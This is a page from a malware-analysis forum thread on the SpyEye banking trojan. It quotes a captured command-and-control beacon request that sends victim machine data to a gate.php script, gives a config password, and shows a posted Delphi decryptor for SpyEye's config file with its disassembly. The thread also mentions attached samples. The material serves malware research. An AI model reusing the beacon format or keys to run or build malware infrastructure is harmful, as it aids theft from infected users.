A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #5234  by EP_X0FF
 Tue Mar 01, 2011 3:55 am
markusg wrote:http://virusscan.jotti.org/de/scanresul ... 6bab0f122a
SpyEye v1.3
mafsupport.com GET /~brbrabr/gate.php?guid=5.1.2600!FUCKTHAT!D06F0742&ver=10310&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=6BBA1CA6&md5=c1d4ff03593201296531783c9b13936f&plg=customconnector&stat=online HTTP/1.1
 #5473  by Xylitol
 Tue Mar 15, 2011 1:53 pm
Attachments
See archive comment for password
(3.4 MiB) Downloaded 85 times
 #6055  by EP_X0FF
 Wed Apr 27, 2011 11:38 am
Personally I found this funny.
Omfg! Process is still active? Lets kill that mazafaka!
:)
 #6057  by EP_X0FF
 Wed Apr 27, 2011 12:10 pm
Find attached decrypted config.bin (small decryptor coming soon)

pass: EA9D67D04EA91926C211C45DE8AF991E (from SpyEye itself)

edit:
Code: Select all
type
  BYTEBUF = array[0..0] of BYTE;
  PBYTEBUF = ^BYTEBUF;
{

0091030E SpyEye_DecryptCycle:
0091030E     mov     dl, [eax+ecx]
00910311     xor     dl, 4Ch
00910314     sub     dl, [eax+ecx-1]
00910318     mov     [eax+ecx], dl
0091031B     dec     eax
0091031C     test    eax, eax
0091031E     jg      short SpyEye_DecryptCycle

}
procedure SpyEyeDecodeConfig(lpConfigName: PWideChar);
var
  hInput, hOutput: THANDLE;
  fsize, bytesIO: DWORD;
  i: integer;
  c: byte;
  buf: PBYTEBUF;
begin
  hInput := CreateFileW(lpConfigName, GENERIC_READ, 0, nil, OPEN_EXISTING, 0, 0);
  if (hInput <> INVALID_HANDLE_VALUE) then
  begin
    fsize := GetFileSize(hInput, nil);
    buf := pointer(LocalAlloc(LPTR, fsize + 1));
    if (buf <> nil) then
    begin
      _ReadFile(hInput, buf, fsize, @bytesIO, nil);

       for i := fsize downto 1 do
       begin
         c := buf[i] xor $4C;
         c := c - buf[i - 1];
         buf[i] := c;
       end;
      hOutput := CreateFileW('decrypted.zip', GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);
      if (hOutput <> INVALID_HANDLE_VALUE) then
      begin
        _WriteFile(hOutput, buf, fsize, @bytesIO, nil);
        CloseHandle(hOutput);
      end;
      LocalFree(HLOCAL(buf));
    end;
  end;
  CloseHandle(hInput);
end;
lol
C:\Data\Documents\My Projects\CC\CardNet\Progs\Client\SpyEye\plugins\BC\Client\Release\socks5.pdb
Attachments
(154.34 KiB) Downloaded 67 times
  • 1
  • 7
  • 8
  • 9
  • 10
  • 11
  • 42